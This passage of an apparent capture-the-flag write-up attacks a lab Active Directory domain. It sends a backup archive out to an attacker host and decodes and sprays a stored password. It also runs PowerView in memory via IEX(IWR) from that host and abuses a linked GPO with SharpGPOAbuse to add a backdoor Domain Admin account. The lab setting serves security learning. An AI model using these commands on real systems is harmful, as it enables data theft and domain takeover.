wapt-backup-sunday.7z C:\$RECYCLE.BIN\S-1-5-21-2386970044-1145388522-2932701813-1103\$RE2XMEG.7z
I wasn't able to make impacket-smbserver work, so to download the file I created a simple server which accepts files.
from flask import Flask, request
from pathlib import Path

SAVE_LOCATION = Path('./www')
SAVE_LOCATION.mkdir(exist_ok=True)
app = Flask(__name__)


@app.route('/', methods=['POST'])
def upload_file():
    # expects a multipart form with a single "file" field (curl -F 'file=@...')
    if 'file' not in request.files:
        return 'No file part', 400
    file = request.files['file']
    if not file.filename:
        return 'No selected file', 400
    # keep only the basename so the upload always lands inside SAVE_LOCATION
    filename = Path(file.filename).name
    file.save(SAVE_LOCATION / filename)
    return 'File uploaded successfully', 200


if __name__ == '__main__':
    app.run(host='0.0.0.0', port=8000, debug=False)
PS C:\users\f.frizzle\music> curl.exe 10.10.14.18:8000 -F 'file=@wapt-backup-sunday.7z'
File uploaded successfully
WAPT
Unzip
└─$ 7z x wapt-backup-sunday.7z
The project seems to be using https://github.com/tranquilit/WAPT: "WAPT is an established method for managing the lifecycle of an installed base of Windows applications. WAPT has many similarities with Debian's APT software manager, thus its name. WAPT is particularly useful to system administrators who are tired of repetitive and low value tasks."
Not sure what modifications have been made to the project, but there's a configuration file which contains a password.

It looks like it could be a base64-encoded password:
└─$ echo 'IXN1QmNpZ0BNZWhUZWQhUgo=' | base64 -d
!suBcig@MehTed!R
Password Reuse
Get other users
PS C:\users\f.frizzle\music> Get-LocalUser | Select-Object -ExpandProperty Name
Administrator
Guest
krbtgt
f.frizzle
w.li
h.arm
M.SchoolBus
d.hudson
k.franklin
l.awesome
t.wright
r.tennelli
J.perlstein
a.perlstein
p.terese
v.frizzle
g.frizzle
c.sandiego
c.ramon
m.ramon
w.Webservice
Test for password reuse.
└─$ faketime -f +7h netexec smb frizzdc.frizz.htb -u users.txt -p '!suBcig@MehTed!R' -k --continue-on-success
...
SMB frizzdc.frizz.htb 445 frizzdc [+] frizz.htb\M.SchoolBus:!suBcig@MehTed!R
...
Shell
└─$ faketime -f +7h impacket-getTGT -dc-ip 'frizzdc.frizz.htb' 'frizz.htb'/'M.SchoolBus':'!suBcig@MehTed!R' -k
└─$ export KRB5CCNAME=$(readlink -f ./M.SchoolBus.ccache)
└─$ faketime -f +7h evil-winrm -i frizzdc.frizz.htb -r frizz.htb
*Evil-WinRM* PS C:\Users\M.SchoolBus\Documents> whoami /all
User Name SID
================= ==============================================
frizz\m.schoolbus S-1-5-21-2386970044-1145388522-2932701813-1106
Group Name Type SID Attributes
============================================ ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
frizz\Desktop Admins Group S-1-5-21-2386970044-1145388522-2932701813-1121 Mandatory group, Enabled by default, Enabled group
frizz\Group Policy Creator Owners Group S-1-5-21-2386970044-1145388522-2932701813-520 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
frizz\Denied RODC Password Replication Group Alias S-1-5-21-2386970044-1145388522-2932701813-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Get data for bloodhound
└─$ faketime -f +7h bloodhound-python -u 'M.SchoolBus' -p '!suBcig@MehTed!R' -d frizz.htb -ns 10.129.123.117 -dc frizzdc.frizz.htb -c all --zip -k
INFO: Found AD domain: frizz.htb
INFO: Using TGT from cache
INFO: Found TGT with correct principal in ccache file.
INFO: Connecting to LDAP server: frizzdc.frizz.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: frizzdc.frizz.htb
INFO: Found 22 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 20 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: frizzdc.frizz.htb
INFO: Done in 00M 16S
INFO: Compressing output into 20250316112848_bloodhound.zip

The owned users don't have any outbound permissions, so let's check their groups.
Group Policy Creator Owners: This group is authorized to create, edit, and delete Group Policy Objects in the domain. By default, the only member of the group is Administrator.
https://www.thehacker.recipes/ad/movement/group-policies
PS C:\Users\M.SchoolBus\Documents> Get-GPO -All
DisplayName : Default Domain Policy
DomainName : frizz.htb
Owner : frizz\Domain Admins
Id : 31b2f340-016d-11d2-945f-00c04fb984f9
GpoStatus : AllSettingsEnabled
Description :
CreationTime : 10/29/2024 7:19:24 AM
ModificationTime : 10/29/2024 7:25:44 AM
UserVersion : AD Version: 0, SysVol Version: 0
ComputerVersion : AD Version: 2, SysVol Version: 2
WmiFilter :
DisplayName : Default Domain Controllers Policy
DomainName : frizz.htb
Owner : frizz\Domain Admins
Id : 6ac1786c-016f-11d2-945f-00c04fb984f9
GpoStatus : AllSettingsEnabled
Description :
CreationTime : 10/29/2024 7:19:24 AM
ModificationTime : 10/29/2024 7:19:24 AM
UserVersion : AD Version: 0, SysVol Version: 0
ComputerVersion : AD Version: 1, SysVol Version: 1
WmiFilter :
PS C:\Users\M.SchoolBus\Documents> New-GPO -Name "Nothing2See"
DisplayName : Nothing2See
DomainName : frizz.htb
Owner : frizz\M.SchoolBus
Id : 41f36df0-1662-49f9-bdb9-968a54ac3073
GpoStatus : AllSettingsEnabled
Description :
CreationTime : 3/16/2025 10:22:14 AM
ModificationTime : 3/16/2025 10:22:14 AM
UserVersion : AD Version: 0, SysVol Version: 0
ComputerVersion : AD Version: 0, SysVol Version: 0
WmiFilter :
└─$ curl -LOs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/26a0757612e5654b4f792b012ab8f10f95d391c9/Recon/PowerView.ps1
*Evil-WinRM* PS C:\Users\M.SchoolBus\Documents> IEX(IWR 10.10.14.18/PowerView.ps1 -UseBasicParsing)
PS C:\Users\M.SchoolBus\Documents> New-GPOImmediateTask -Verbose -Force -TaskName 'Test' -GPODisplayName 'Nothing2See' -Command cmd -CommandArguments "/c net user letmein Password123 /add /domain && net group 'Domain Admins' letmein /add /domain && net group 'Enterprise Admins' letmein /add /domain && net localgroup Administrators letmein /add && net localgroup 'Remote Management Users' letmein /add"
VERBOSE: Get-DomainSearcher search string: LDAP://DC=frizz,DC=htb
VERBOSE: Trying to weaponize GPO: {41F36DF0-1662-49F9-BDB9-968A54AC3073}
PS C:\Users\M.SchoolBus\Documents> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
Note: Use the PowerView version linked from The Hacker Recipes, because the latest PowerView doesn't have this function.
With PowerView nothing was changed or updated...
pyGPOAbuse also kept failing due to connection errors:
└─$ faketime -f +7h pygpoabuse 'frizz.htb'/'M.SchoolBus':'!suBcig@MehTed!R' -gpo-id '8a6ec73d-b29a-447b-b820-3057f389393c' -command 'net user letmein Password123$ /add' -f -v -k -ccache M.SchoolBus.ccache
└─$ cp /opt/scripts/exploit/SharpGPOAbuse/SharpGPOAbuse.exe ./www
PS C:\Users\M.SchoolBus\Music> curl.exe 10.10.14.18/SharpGPOAbuse.exe -O
PS C:\Users\M.SchoolBus\Music> New-GPO -Name "Nothing2See"
PS C:\Users\M.SchoolBus\Music> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount m.schoolbus --GPOName "Nothing2See"
[+] Domain = frizz.htb
[+] Domain Controller = frizzdc.frizz.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=frizz,DC=htb
[+] SID Value of m.schoolbus = S-1-5-21-2386970044-1145388522-2932701813-1106
[+] GUID of "Nothing2See" is: {3AC5E58D-A78C-4182-85CE-728C73222475}
[+] Creating file \\frizz.htb\SysVol\frizz.htb\Policies\{3AC5E58D-A78C-4182-85CE-728C73222475}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!
*Evil-WinRM* PS C:\Users\M.SchoolBus\Music> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
Still nothing. After going over a few things I found https://github.com/3gstudent/Homework-of-Powershell/tree/master?tab=readme-ov-file#new-gpoimmediatetaskps1. New-GPO only creates the GPO and never links it to the domain, hence it was failing: the GPO was never linked, so gpupdate never applied it.
New-GPO "Nothing2See" | New-GPLink -Target "dc=frizz,dc=htb"
\Users\M.SchoolBus\Music\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount m.schoolbus --GPOName "Nothing2See" --Force
gpupdate /force
whoami /groups | sls Administrators
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
Root.txt
PS C:\Users\M.SchoolBus\Music> cat /Users/Administrator/Desktop/root.txt
bfa493772fde11d97703fcbf46dd5852
Bonkers
Instead of just making myself a local admin, I wanted to add a top-level domain administrator with remote PowerShell access.
@echo off
set "username=letmein"
set "password=Password123$"
net user %username% %password% /add /domain
net group "Domain Admins" %username% /add /domain
net group "Enterprise Admins" %username% /add /domain
net localgroup Administrators %username% /add
net localgroup "Remote Management Users" %username% /add
Use base64 to write the file, since there's no text editor available in this shell (?)
[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("QGVjaG8gb2ZmCnNldCAidXNlcm5hbWU9bGV0bWVpbiIKc2V0ICJwYXNzd29yZD1QYXNzd29yZDEyMyQiCm5ldCB1c2VyICV1c2VybmFtZSUgJXBhc3N3b3JkJSAvYWRkIC9kb21haW4KbmV0IGdyb3VwICJEb21haW4gQWRtaW5zIiAldXNlcm5hbWUlIC9hZGQgL2RvbWFpbgpuZXQgZ3JvdXAgIkVudGVycHJpc2UgQWRtaW5zIiAldXNlcm5hbWUlIC9hZGQgL2RvbWFpbgpuZXQgbG9jYWxncm91cCBBZG1pbmlzdHJhdG9ycyAldXNlcm5hbWUlIC9hZGQKbmV0IGxvY2FsZ3JvdXAgIlJlbW90ZSBNYW5hZ2VtZW50IFVzZXJzIiAldXNlcm5hbWUlIC9hZGQ=")) | Out-File create_user.bat -Encoding "ASCII"
Note: For some god damn reason Out-File (or > redirection) uses Unicode encoding by default, which is UTF-16LE with a byte-order mark, and cmd.exe doesn't cope with those extra bytes in a batch file... To avoid them, use ASCII encoding.
Run the script
Remove-GPO Nothing2See
New-GPO "Nothing2See" | New-GPLink -Target "dc=frizz,dc=htb"
\Users\M.SchoolBus\Music\SharpGPOAbuse.exe --AddComputerTask --TaskName "Letmein" --Author FRIZZ.HTB\m.schoolbus --Command "cmd.exe" --Arguments "/c \Users\M.SchoolBus\Music\create_user.bat" --GPOName "Nothing2See" --Force
gpupdate /force
net user letmein
Remove-GPO Nothing2See; New-GPO "Nothing2See" | New-GPLink -Target "dc=frizz,dc=htb"; \Users\M.SchoolBus\Music\SharpGPOAbuse.exe --AddComputerTask --TaskName "Letmein" --Author FRIZZ.HTB\m.schoolbus --Command "cmd.exe" --Arguments "/c \Users\M.SchoolBus\Music\create_user.bat" --GPOName "Nothing2See" --Force; gpupdate /force; net user letmein
Login
└─$ faketime -f +7h impacket-getTGT -dc-ip 'frizzdc.frizz.htb' 'frizz.htb'/'letmein':'Password123$' -k
└─$ export KRB5CCNAME=$(readlink -f ./letmein.ccache)
└─$ faketime -f +7h evil-winrm -i frizzdc.frizz.htb -r frizz.htb
*Evil-WinRM* PS C:\Users\letmein3\Documents> whoami /all
User Name SID
============== ===============================================
frizz\letmein3 S-1-5-21-2386970044-1145388522-2932701813-11108
Group Name Type SID Attributes
============================================ ================ ============================================= ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
frizz\Domain Admins Group S-1-5-21-2386970044-1145388522-2932701813-512 Mandatory group, Enabled by default, Enabled group
frizz\Enterprise Admins Group S-1-5-21-2386970044-1145388522-2932701813-519 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
frizz\Denied RODC Password Replication Group Alias S-1-5-21-2386970044-1145388522-2932701813-572 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level Label S-1-16-12288
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled